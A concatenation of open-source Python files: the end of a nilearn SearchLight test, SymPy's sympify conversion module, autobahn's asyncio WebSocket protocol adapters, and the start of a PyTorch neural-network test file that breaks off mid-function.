mask = np.ones((5, 5, 5), dtype=bool)
mask_img = nibabel.Nifti1Image(mask.astype(int), np.eye(4))
# Create a condition array, with balanced classes
cond = np.arange(frames, dtype=int) >= (frames // 2)
# Create an activation pixel.
data[2, 2, 2, :] = 0
data[2, 2, 2][cond.astype(bool)] = 2
data_img = nibabel.Nifti1Image(data, np.eye(4))
# Define cross validation
from sklearn.model_selection import KFold
cv = KFold(n_splits=4)
n_jobs = 1
# Run Searchlight with different radii
# Small radius : only one pixel is selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img,
radius=0.5, n_jobs=n_jobs,
scoring='accuracy', cv=cv, verbose=1)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 1
assert sl.scores_[2, 2, 2] == 1.
# The voxel selected in process_mask_img is too far from the signal
process_mask = np.zeros((5, 5, 5), dtype=bool)
process_mask[0, 0, 0] = True
process_mask_img = nibabel.Nifti1Image(process_mask.astype(int),
np.eye(4))
sl = searchlight.SearchLight(mask_img, process_mask_img=process_mask_img,
radius=0.5, n_jobs=n_jobs,
scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 0
# Medium radius : little ball selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
assert sl.scores_[1, 2, 2] == 1.
assert sl.scores_[2, 1, 2] == 1.
assert sl.scores_[2, 2, 1] == 1.
assert sl.scores_[3, 2, 2] == 1.
assert sl.scores_[2, 3, 2] == 1.
assert sl.scores_[2, 2, 3] == 1.
# Big radius : big ball selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=2,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 33
assert sl.scores_[2, 2, 2] == 1.
# group cross validation
try:
from sklearn.model_selection import LeaveOneGroupOut
gcv = LeaveOneGroupOut()
except ImportError:
# won't import model selection if it's not there.
# the groups variable should have no effect.
gcv = cv
groups = np.random.RandomState(42).permutation(
np.arange(frames, dtype=int) > (frames // 2)
)
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=gcv)
sl.fit(data_img, cond, groups)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
# adding superfluous group variable
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond, groups)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
# Check whether searchlight works on list of 3D images
rand = np.random.RandomState(0)
data = rand.rand(5, 5, 5)
data_img = nibabel.Nifti1Image(data, affine=np.eye(4))
imgs = [data_img] * 12
# labels
y = [0, 1] * 6
# run searchlight on list of 3D images
sl = searchlight.SearchLight(mask_img)
sl.fit(imgs, y)
|
the-stack_0_19817 | """sympify -- convert objects SymPy internal format"""
from __future__ import print_function, division
from inspect import getmro
from .core import all_classes as sympy_classes
from .compatibility import iterable, string_types
class SympifyError(ValueError):
def __init__(self, expr, base_exc=None):
self.expr = expr
self.base_exc = base_exc
def __str__(self):
if self.base_exc is None:
return "SympifyError: %r" % (self.expr,)
return ("Sympify of expression '%s' failed, because of exception being "
"raised:\n%s: %s" % (self.expr, self.base_exc.__class__.__name__,
str(self.base_exc)))
converter = {} # See sympify docstring.
class CantSympify(object):
"""
Mix in this trait to a class to disallow sympification of its instances.
Example
=======
>>> from sympy.core.sympify import sympify, CantSympify
>>> class Something(dict):
... pass
...
>>> sympify(Something())
{}
>>> class Something(dict, CantSympify):
... pass
...
>>> sympify(Something())
Traceback (most recent call last):
...
SympifyError: SympifyError: {}
"""
pass
def sympify(a, locals=None, convert_xor=True, strict=False, rational=False, evaluate=True):
"""Converts an arbitrary expression to a type that can be used inside SymPy.
For example, it will convert Python ints into instance of sympy.Rational,
floats into instances of sympy.Float, etc. It is also able to coerce symbolic
expressions which inherit from Basic. This can be useful in cooperation
with SAGE.
It currently accepts as arguments:
- any object defined in sympy
- standard numeric python types: int, long, float, Decimal
- strings (like "0.09" or "2e-19")
- booleans, including ``None`` (will leave ``None`` unchanged)
- lists, sets or tuples containing any of the above
If the argument is already a type that SymPy understands, it will do
nothing but return that value. This can be used at the beginning of a
function to ensure you are working with the correct type.
>>> from sympy import sympify
>>> sympify(2).is_integer
True
>>> sympify(2).is_real
True
>>> sympify(2.0).is_real
True
>>> sympify("2.0").is_real
True
>>> sympify("2e-45").is_real
True
If the expression could not be converted, a SympifyError is raised.
>>> sympify("x***2")
Traceback (most recent call last):
...
SympifyError: SympifyError: "could not parse u'x***2'"
Locals
------
The sympification happens with access to everything that is loaded
by ``from sympy import *``; anything used in a string that is not
defined by that import will be converted to a symbol. In the following,
    the ``bitcount`` function is treated as a symbol and the ``O`` is
interpreted as the Order object (used with series) and it raises
an error when used improperly:
>>> s = 'bitcount(42)'
>>> sympify(s)
bitcount(42)
>>> sympify("O(x)")
O(x)
>>> sympify("O + 1")
Traceback (most recent call last):
...
TypeError: unbound method...
In order to have ``bitcount`` be recognized it can be imported into a
namespace dictionary and passed as locals:
>>> from sympy.core.compatibility import exec_
>>> ns = {}
>>> exec_('from sympy.core.evalf import bitcount', ns)
>>> sympify(s, locals=ns)
6
In order to have the ``O`` interpreted as a Symbol, identify it as such
in the namespace dictionary. This can be done in a variety of ways; all
three of the following are possibilities:
>>> from sympy import Symbol
>>> ns["O"] = Symbol("O") # method 1
>>> exec_('from sympy.abc import O', ns) # method 2
>>> ns.update(dict(O=Symbol("O"))) # method 3
>>> sympify("O + 1", locals=ns)
O + 1
If you want *all* single-letter and Greek-letter variables to be symbols
then you can use the clashing-symbols dictionaries that have been defined
there as private variables: _clash1 (single-letter variables), _clash2
(the multi-letter Greek names) or _clash (both single and multi-letter
names that are defined in abc).
>>> from sympy.abc import _clash1
>>> _clash1
{'C': C, 'E': E, 'I': I, 'N': N, 'O': O, 'Q': Q, 'S': S}
>>> sympify('C & Q', _clash1)
And(C, Q)
Strict
------
If the option ``strict`` is set to ``True``, only the types for which an
explicit conversion has been defined are converted. In the other
cases, a SympifyError is raised.
>>> print(sympify(None))
None
>>> sympify(None, strict=True)
Traceback (most recent call last):
...
SympifyError: SympifyError: None
Evaluation
----------
If the option ``evaluate`` is set to ``False``, then arithmetic and
operators will be converted into their SymPy equivalents and the
``evaluate=False`` option will be added. Nested ``Add`` or ``Mul`` will
be denested first. This is done via an AST transformation that replaces
operators with their SymPy equivalents, so if an operand redefines any
of those operations, the redefined operators will not be used.
>>> sympify('2**2 / 3 + 5')
19/3
>>> sympify('2**2 / 3 + 5', evaluate=False)
2**2/3 + 5
Extending
---------
To extend ``sympify`` to convert custom objects (not derived from ``Basic``),
just define a ``_sympy_`` method to your class. You can do that even to
classes that you do not own by subclassing or adding the method at runtime.
>>> from sympy import Matrix
>>> class MyList1(object):
... def __iter__(self):
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
... def _sympy_(self): return Matrix(self)
>>> sympify(MyList1())
Matrix([
[1],
[2]])
If you do not have control over the class definition you could also use the
``converter`` global dictionary. The key is the class and the value is a
function that takes a single argument and returns the desired SymPy
object, e.g. ``converter[MyList] = lambda x: Matrix(x)``.
>>> class MyList2(object): # XXX Do not do this if you control the class!
... def __iter__(self): # Use _sympy_!
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
>>> from sympy.core.sympify import converter
>>> converter[MyList2] = lambda x: Matrix(x)
>>> sympify(MyList2())
Matrix([
[1],
[2]])
Notes
=====
Sometimes autosimplification during sympification results in expressions
that are very different in structure than what was entered. Until such
autosimplification is no longer done, the ``kernS`` function might be of
some use. In the example below you can see how an expression reduces to
-1 by autosimplification, but does not do so when ``kernS`` is used.
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x
>>> -2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
-1
>>> s = '-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1'
>>> sympify(s)
-1
>>> kernS(s)
-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
"""
try:
cls = a.__class__
except AttributeError: # a is probably an old-style class object
cls = type(a)
if cls in sympy_classes:
return a
if cls is type(None):
if strict:
raise SympifyError(a)
else:
return a
try:
return converter[cls](a)
except KeyError:
for superclass in getmro(cls):
try:
return converter[superclass](a)
except KeyError:
continue
if isinstance(a, CantSympify):
raise SympifyError(a)
try:
return a._sympy_()
except AttributeError:
pass
if not isinstance(a, string_types):
for coerce in (float, int):
try:
return sympify(coerce(a))
except (TypeError, ValueError, AttributeError, SympifyError):
continue
if strict:
raise SympifyError(a)
if iterable(a):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
if isinstance(a, dict):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a.items()])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
# At this point we were given an arbitrary expression
# which does not inherit from Basic and doesn't implement
# _sympy_ (which is a canonical and robust way to convert
# anything to SymPy expression).
#
# As a last chance, we try to take "a"'s normal form via unicode()
# and try to parse it. If it fails, then we have no luck and
# return an exception
try:
from .compatibility import unicode
a = unicode(a)
except Exception as exc:
raise SympifyError(a, exc)
from sympy.parsing.sympy_parser import (parse_expr, TokenError,
standard_transformations)
from sympy.parsing.sympy_parser import convert_xor as t_convert_xor
from sympy.parsing.sympy_parser import rationalize as t_rationalize
transformations = standard_transformations
if rational:
transformations += (t_rationalize,)
if convert_xor:
transformations += (t_convert_xor,)
try:
a = a.replace('\n', '')
expr = parse_expr(a, local_dict=locals, transformations=transformations, evaluate=evaluate)
except (TokenError, SyntaxError) as exc:
raise SympifyError('could not parse %r' % a, exc)
return expr
def _sympify(a):
"""
Short version of sympify for internal usage for __add__ and __eq__ methods
where it is ok to allow some things (like Python integers and floats) in
the expression. This excludes things (like strings) that are unwise to
allow into such an expression.
>>> from sympy import Integer
>>> Integer(1) == 1
True
>>> Integer(1) == '1'
False
>>> from sympy.abc import x
>>> x + 1
x + 1
>>> x + '1'
Traceback (most recent call last):
...
TypeError: unsupported operand type(s) for +: 'Symbol' and 'str'
see: sympify
"""
return sympify(a, strict=True)
def kernS(s):
"""Use a hack to try keep autosimplification from joining Integer or
minus sign into an Add of a Mul; this modification doesn't
prevent the 2-arg Mul from becoming an Add, however.
Examples
========
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x, y, z
The 2-arg Mul allows a leading Integer to be distributed but kernS will
prevent that:
>>> 2*(x + y)
2*x + 2*y
>>> kernS('2*(x + y)')
2*(x + y)
If use of the hack fails, the un-hacked string will be passed to sympify...
and you get what you get.
XXX This hack should not be necessary once issue 1497 has been resolved.
"""
import re
from sympy.core.symbol import Symbol
hit = False
if '(' in s:
if s.count('(') != s.count(")"):
raise SympifyError('unmatched left parenthesis')
kern = '_kern'
while kern in s:
kern += "_"
olds = s
# digits*( -> digits*kern*(
s = re.sub(r'(\d+)( *\* *)\(', r'\1*%s\2(' % kern, s)
# negated parenthetical
kern2 = kern + "2"
while kern2 in s:
kern2 += "_"
# step 1: -(...) --> kern-kern*(...)
target = r'%s-%s*(' % (kern, kern)
s = re.sub(r'- *\(', target, s)
# step 2: double the matching closing parenthesis
# kern-kern*(...) --> kern-kern*(...)kern2
i = nest = 0
while True:
j = s.find(target, i)
if j == -1:
break
j = s.find('(')
for j in range(j, len(s)):
if s[j] == "(":
nest += 1
elif s[j] == ")":
nest -= 1
if nest == 0:
break
s = s[:j] + kern2 + s[j:]
i = j
# step 3: put in the parentheses
# kern-kern*(...)kern2 --> (-kern*(...))
s = s.replace(target, target.replace(kern, "(", 1))
s = s.replace(kern2, ')')
hit = kern in s
for i in range(2):
try:
expr = sympify(s)
break
except: # the kern might cause unknown errors, so use bare except
if hit:
s = olds # maybe it didn't like the kern; use un-kerned s
hit = False
continue
expr = sympify(s) # let original error raise
if not hit:
return expr
rep = {Symbol(kern): 1}
def _clear(expr):
if isinstance(expr, (list, tuple, set)):
return type(expr)([_clear(e) for e in expr])
if hasattr(expr, 'subs'):
return expr.subs(rep, hack2=True)
return expr
expr = _clear(expr)
# hope that kern is not there anymore
return expr
|
the-stack_0_19818 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import asyncio
from asyncio import iscoroutine
from asyncio import Future
from collections import deque
import txaio
txaio.use_asyncio()
from autobahn.util import public
from autobahn.asyncio.util import transport_channel_id, peer2str
from autobahn.wamp import websocket
from autobahn.websocket import protocol
from autobahn.websocket.types import TransportDetails
__all__ = (
'WebSocketServerProtocol',
'WebSocketClientProtocol',
'WebSocketServerFactory',
'WebSocketClientFactory',
'WampWebSocketServerProtocol',
'WampWebSocketClientProtocol',
'WampWebSocketServerFactory',
'WampWebSocketClientFactory',
)
def yields(value):
"""
Returns ``True`` iff the value yields.
.. seealso:: http://stackoverflow.com/questions/20730248/maybedeferred-analog-with-asyncio
"""
return isinstance(value, Future) or iscoroutine(value)
class WebSocketAdapterProtocol(asyncio.Protocol):
"""
Adapter class for asyncio-based WebSocket client and server protocols.
"""
peer = None
peer_transport = None
def connection_made(self, transport):
self.transport = transport
self.receive_queue = deque()
self._consume()
# the peer we are connected to
try:
self.peer = peer2str(transport.get_extra_info('peername'))
except:
self.peer = 'process:{}'.format(self.transport.pid)
self.peer_transport = 'websocket'
self._connectionMade()
def connection_lost(self, exc):
self._connectionLost(exc)
# according to asyncio docs, connection_lost(None) is called
# if something else called transport.close()
if exc is not None:
self.transport.close()
self.transport = None
def _consume(self):
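        # Receive pump: arm a Future that data_received resolves; its callback
        # drains every queued chunk into the WebSocket protocol, then re-arms.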
self.waiter = Future(loop=self.factory.loop or txaio.config.loop)
def process(_):
while len(self.receive_queue):
data = self.receive_queue.popleft()
if self.transport:
self._dataReceived(data)
self._consume()
self.waiter.add_done_callback(process)
def data_received(self, data):
self.receive_queue.append(data)
if not self.waiter.done():
self.waiter.set_result(None)
def _closeConnection(self, abort=False):
if abort and hasattr(self.transport, 'abort'):
self.transport.abort()
else:
self.transport.close()
def _onOpen(self):
res = self.onOpen()
if yields(res):
asyncio.ensure_future(res)
def _onMessageBegin(self, isBinary):
res = self.onMessageBegin(isBinary)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameBegin(self, length):
res = self.onMessageFrameBegin(length)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameData(self, payload):
res = self.onMessageFrameData(payload)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameEnd(self):
res = self.onMessageFrameEnd()
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrame(self, payload):
res = self.onMessageFrame(payload)
if yields(res):
asyncio.ensure_future(res)
def _onMessageEnd(self):
res = self.onMessageEnd()
if yields(res):
asyncio.ensure_future(res)
def _onMessage(self, payload, isBinary):
res = self.onMessage(payload, isBinary)
if yields(res):
asyncio.ensure_future(res)
def _onPing(self, payload):
res = self.onPing(payload)
if yields(res):
asyncio.ensure_future(res)
def _onPong(self, payload):
res = self.onPong(payload)
if yields(res):
asyncio.ensure_future(res)
def _onClose(self, wasClean, code, reason):
res = self.onClose(wasClean, code, reason)
if yields(res):
asyncio.ensure_future(res)
def registerProducer(self, producer, streaming):
raise Exception("not implemented")
def unregisterProducer(self):
# note that generic websocket/protocol.py code calls
# .unregisterProducer whenever we dropConnection -- that's
# correct behavior on Twisted so either we'd have to
        # try/except there, or special-case Twisted, or just make
# this "not an error"
pass
@public
class WebSocketServerProtocol(WebSocketAdapterProtocol, protocol.WebSocketServerProtocol):
"""
Base class for asyncio-based WebSocket server protocols.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketChannel`
"""
log = txaio.make_logger()
def get_channel_id(self, channel_id_type=None):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.get_channel_id`
"""
return transport_channel_id(self.transport, True, channel_id_type)
@public
class WebSocketClientProtocol(WebSocketAdapterProtocol, protocol.WebSocketClientProtocol):
"""
Base class for asyncio-based WebSocket client protocols.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketChannel`
"""
log = txaio.make_logger()
def _onConnect(self, response):
res = self.onConnect(response)
if yields(res):
asyncio.ensure_future(res)
def startTLS(self):
raise Exception("WSS over explicit proxies not implemented")
def get_channel_id(self, channel_id_type=None):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.get_channel_id`
"""
return transport_channel_id(self.transport, False, channel_id_type)
def _create_transport_details(self):
"""
Internal helper.
Base class calls this to create a TransportDetails
"""
is_secure = self.transport.get_extra_info('peercert', None) is not None
if is_secure:
secure_channel_id = {
'tls-unique': transport_channel_id(self.transport, False, 'tls-unique'),
}
else:
secure_channel_id = {}
return TransportDetails(peer=self.peer, is_secure=is_secure, secure_channel_id=secure_channel_id)
class WebSocketAdapterFactory(object):
"""
Adapter class for asyncio-based WebSocket client and server factories.
"""
log = txaio.make_logger()
def __call__(self):
proto = self.protocol()
proto.factory = self
return proto
@public
class WebSocketServerFactory(WebSocketAdapterFactory, protocol.WebSocketServerFactory):
"""
Base class for asyncio-based WebSocket server factories.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketServerChannelFactory`
"""
protocol = WebSocketServerProtocol
def __init__(self, *args, **kwargs):
"""
.. note::
In addition to all arguments to the constructor of
:meth:`autobahn.websocket.interfaces.IWebSocketServerChannelFactory`,
you can supply a ``loop`` keyword argument to specify the
asyncio event loop to be used.
"""
loop = kwargs.pop('loop', None)
self.loop = loop or asyncio.get_event_loop()
protocol.WebSocketServerFactory.__init__(self, *args, **kwargs)
@public
class WebSocketClientFactory(WebSocketAdapterFactory, protocol.WebSocketClientFactory):
"""
Base class for asyncio-based WebSocket client factories.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketClientChannelFactory`
"""
def __init__(self, *args, **kwargs):
"""
.. note::
In addition to all arguments to the constructor of
:meth:`autobahn.websocket.interfaces.IWebSocketClientChannelFactory`,
you can supply a ``loop`` keyword argument to specify the
asyncio event loop to be used.
"""
loop = kwargs.pop('loop', None)
self.loop = loop or asyncio.get_event_loop()
protocol.WebSocketClientFactory.__init__(self, *args, **kwargs)
@public
class WampWebSocketServerProtocol(websocket.WampWebSocketServerProtocol, WebSocketServerProtocol):
"""
asyncio-based WAMP-over-WebSocket server protocol.
Implements:
* :class:`autobahn.wamp.interfaces.ITransport`
"""
@public
class WampWebSocketServerFactory(websocket.WampWebSocketServerFactory, WebSocketServerFactory):
"""
asyncio-based WAMP-over-WebSocket server factory.
"""
protocol = WampWebSocketServerProtocol
def __init__(self, factory, *args, **kwargs):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializers: A list of WAMP serializers to use (or ``None``
for all available serializers).
:type serializers: list of objects implementing
:class:`autobahn.wamp.interfaces.ISerializer`
"""
serializers = kwargs.pop('serializers', None)
websocket.WampWebSocketServerFactory.__init__(self, factory, serializers)
kwargs['protocols'] = self._protocols
# noinspection PyCallByClass
WebSocketServerFactory.__init__(self, *args, **kwargs)
@public
class WampWebSocketClientProtocol(websocket.WampWebSocketClientProtocol, WebSocketClientProtocol):
"""
asyncio-based WAMP-over-WebSocket client protocols.
Implements:
* :class:`autobahn.wamp.interfaces.ITransport`
"""
@public
class WampWebSocketClientFactory(websocket.WampWebSocketClientFactory, WebSocketClientFactory):
"""
asyncio-based WAMP-over-WebSocket client factory.
"""
protocol = WampWebSocketClientProtocol
def __init__(self, factory, *args, **kwargs):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializer: The WAMP serializer to use (or ``None`` for
"best" serializer, chosen as the first serializer available from
this list: CBOR, MessagePack, UBJSON, JSON).
:type serializer: object implementing :class:`autobahn.wamp.interfaces.ISerializer`
"""
serializers = kwargs.pop('serializers', None)
websocket.WampWebSocketClientFactory.__init__(self, factory, serializers)
kwargs['protocols'] = self._protocols
WebSocketClientFactory.__init__(self, *args, **kwargs)
|
the-stack_0_19819 |
import math
import random
import string
import unittest
import io
import unittest.mock as mock
import itertools
import warnings
import pickle
from copy import deepcopy
from itertools import repeat, product
from functools import reduce
from operator import mul
from collections import OrderedDict
import torch
# TODO: remove this global setting
# NN tests use double as the default dtype
torch.set_default_dtype(torch.double)
from torch._six import inf, nan
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import torch.nn.utils.rnn as rnn_utils
from torch.nn.utils import clip_grad_norm_, clip_grad_value_
import torch.nn.utils.parametrize as parametrize
import torch.nn.utils.prune as prune
from torch.nn.utils import parameters_to_vector, vector_to_parameters
from torch.nn import Parameter
from torch.nn.parameter import UninitializedParameter, UninitializedBuffer
from torch.nn.parallel._functions import Broadcast
from torch.testing._internal.common_dtype import integral_types, get_all_fp_dtypes, get_all_math_dtypes
from torch.testing._internal.common_utils import freeze_rng_state, run_tests, TestCase, skipIfNoLapack, skipIfRocm, \
skipIfRocmVersionLessThan, skipIfNotMiopenSuggestNHWC, TEST_NUMPY, TEST_SCIPY, TEST_WITH_ROCM, download_file, \
get_function_arglist, load_tests, repeat_test_for_types, ALL_TENSORTYPES, \
ALL_TENSORTYPES2, suppress_warnings, TemporaryFileName, TEST_WITH_UBSAN, IS_PPC
from torch.testing._internal.common_cuda import TEST_CUDA, TEST_MULTIGPU, TEST_CUDNN, TEST_CUDNN_VERSION
from torch.testing._internal.common_nn import NNTestCase, NewModuleTest, CriterionTest, \
module_tests, criterion_tests, loss_reference_fns, \
ctcloss_reference, new_module_tests, single_batch_reference_fn
from torch.testing._internal.common_device_type import instantiate_device_type_tests, dtypes, \
dtypesIfCUDA, precisionOverride, skipCUDAIfNoCudnn, skipCUDAIfCudnnVersionLessThan, onlyCUDA, onlyCPU, \
skipCUDAIfRocm, skipCUDAIf, skipCUDAIfNotRocm, skipCUDAIfRocmVersionLessThan, skipCUDAIfNotMiopenSuggestNHWC, \
onlyOnCPUAndCUDA, deviceCountAtLeast, largeTensorTest, expectedFailureMeta, skipMeta
from torch.nn import MultiheadAttention
from hypothesis import given
import torch.testing._internal.hypothesis_utils as hu
from torch.testing._internal.common_utils import _assertGradAndGradgradChecks, gradcheck, gradgradcheck, \
GRADCHECK_NONDET_TOL
from torch.testing._internal.common_utils import dtype2prec_DONTUSE
from torch.testing._internal.common_cuda import tf32_on_and_off, tf32_is_not_fp32, tf32_off, tf32_on
from torch.types import _TensorOrTensors
AMPERE_OR_ROCM = TEST_WITH_ROCM or tf32_is_not_fp32()
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if TEST_SCIPY:
from scipy import stats
import scipy.ndimage
if TEST_NUMPY:
import numpy as np
DOUBLE_TENSORTYPES = [torch.double]
# WARNING: If you add a new top-level test case to this file, you MUST
# update test/run_test.py to list it, otherwise it will NOT be run in
# CI.
class PackedSequenceTest(TestCase):
_type_by_name = {
'torch.DoubleTensor': (torch.DoubleTensor, 'double'),
'torch.FloatTensor': (torch.FloatTensor, 'float'),
# We leave out `'torch.HalfTensor': (torch.HalfTensor, 'half'),`
# because of an error in `pad_packed_sequence`
# > AttributeError: 'torch.HalfTensor' object has no attribute 'fill_'
'torch.LongTensor': (torch.LongTensor, 'long'),
'torch.IntTensor': (torch.IntTensor, 'int'),
'torch.ShortTensor': (torch.ShortTensor, 'short'),
'torch.CharTensor': (torch.CharTensor, 'char'),
'torch.ByteTensor': (torch.ByteTensor, 'byte'),
}
def __init__(self, *args, **kwargs):
super(PackedSequenceTest, self).__init__(*args, **kwargs)
self.batch_size = 5
self.max_length = 6
def _ordered_sequence(self, tensor_type):
"""Create ordered list of random sequences"""
seqs = [tensor_type(random.randint(1, self.max_length))
for _ in range(self.batch_size)]
if tensor_type == torch.ByteTensor:
seqs = [s.random_(0, 256) for s in seqs]
else:
seqs = [s.random_(-128, 128) for s in seqs]
ordered = sorted(seqs, key=len, reverse=True)
return ordered
def _padded_sequence(self, tensor_type):
"""Create Tensor of random padded sequences"""
ordered = self._ordered_sequence(tensor_type)
lengths = [len(i) for i in ordered]
padded_tensor = rnn_utils.pad_sequence(ordered)
return padded_tensor, lengths
def test_type_casts(self):
"""Test type casting of `PackedSequence` against type casting of tensor"""
for _, (input_type, _) in self._type_by_name.items():
for expected_type_str, (_, cast_str) in self._type_by_name.items():
for enforce_sorted in [True, False]:
padded, lengths = self._padded_sequence(input_type)
packed = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted)
# Apply cast to `PackedSequence` instance and unpack
masked = getattr(packed, cast_str)()
unpacked, lengths_out = rnn_utils.pad_packed_sequence(masked)
self.assertEqual(unpacked.type(), expected_type_str)
def test_wrong_order(self):
a = torch.ones(25, 300)
b = torch.ones(22, 300)
b_a = rnn_utils.pad_sequence([b, a])
self.assertRaises(
RuntimeError,
lambda: rnn_utils.pack_padded_sequence(b_a, [22, 25], enforce_sorted=True))
def test_total_length(self):
padded, lengths = self._padded_sequence(torch.FloatTensor)
max_length = max(lengths)
packed = rnn_utils.pack_padded_sequence(padded, lengths)
# test ValueError if total_length < max_length
for total_length in (-1, 0, max_length - 1):
for batch_first in (True, False):
def err_fn():
rnn_utils.pad_packed_sequence(packed, batch_first=batch_first,
total_length=total_length)
self.assertRaisesRegex(ValueError,
r'Expected total_length to be at least the '
r'length of the longest sequence in input',
err_fn)
# test that pad_packed_sequence returns results of correct length
for batch_first in (True, False):
no_extra_pad, _ = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first)
for total_length_delta in (0, 1, 8):
total_length = max_length + total_length_delta
unpacked, lengths_out = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first,
total_length=total_length)
self.assertEqual(lengths, lengths_out)
self.assertEqual(unpacked.size(1 if batch_first else 0), total_length)
if total_length_delta == 0:
ref_output = no_extra_pad
elif batch_first:
extra_pad = no_extra_pad.new_zeros(self.batch_size, total_length_delta)
ref_output = torch.cat([no_extra_pad, extra_pad], 1)
else:
extra_pad = no_extra_pad.new_zeros(total_length_delta, self.batch_size)
ref_output = torch.cat([no_extra_pad, extra_pad], 0)
self.assertEqual(unpacked, ref_output)
def test_to(self):
for enforce_sorted in (True, False):
padded, lengths = self._padded_sequence(torch.IntTensor)
a = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted).cpu()
self.assertIs(a, a.to('cpu'))
self.assertIs(a, a.cpu())
self.assertIs(a, a.to('cpu', dtype=torch.int32))
self.assertEqual(a.long(), a.to(torch.int64))
if torch.cuda.is_available():
for cuda in ['cuda', 'cuda:0' if torch.cuda.device_count() == 1 else 'cuda:1']:
b = a.cuda(device=cuda)
self.assertIs(b, b.to(cuda))
self.assertIs(b, b.cuda())
self.assertEqual(a, b.to('cpu'))
self.assertEqual(b, a.to(cuda))
self.assertEqual(a, b.to('cpu', dtype=torch.int32))
self.assertIs(b, b.to(dtype=torch.int32))
self.assertEqual(b.long(), b.to(dtype=torch.int64))
def test_to_memory_format(self):
m = torch.nn.Conv2d(in_channels=16, out_channels=32, kernel_size=2, bias=True)
m = m.to(memory_format=torch.channels_last)
for param in m.parameters():
if param.dim() == 4:
self.assertTrue(param.is_contiguous(memory_format=torch.channels_last))
class TestAvgPool(TestCase):
def _sum_pool2d(self, x, kernel_size):
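        # unfold extracts each kernel_size window (stride == kernel_size, so
        # non-overlapping) as a column; summing over dim 1 sums each window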
windows = torch.nn.functional.unfold(x, kernel_size=kernel_size, stride=kernel_size)
return torch.sum(windows, dim=1)
def _sum_pool3d(self, x, kernel_size):
        # Because unfold does not support a 3D sliding window, split the tensor
        # along depth into kernel-depth slabs and sum each slab
h = kernel_size[0]
splited_x = [t.sum(0) for t in x.split(h) if t.size(0) == h]
# sum_pool2d assumes tensor in (1, 1, n, m) view, so unsqueeze two times
splited_x = [self._sum_pool2d(t.unsqueeze(0).unsqueeze(0), kernel_size[1:]) for t in splited_x]
joined_x = torch.cat(splited_x)
return joined_x.view(1, joined_x.numel())
def _avg_pool2d(self, x, kernel_size):
size = reduce((lambda x, y: x * y), kernel_size)
return self._sum_pool2d(x, kernel_size) / size
def _avg_pool3d(self, x, kernel_size):
size = reduce((lambda x, y: x * y), kernel_size)
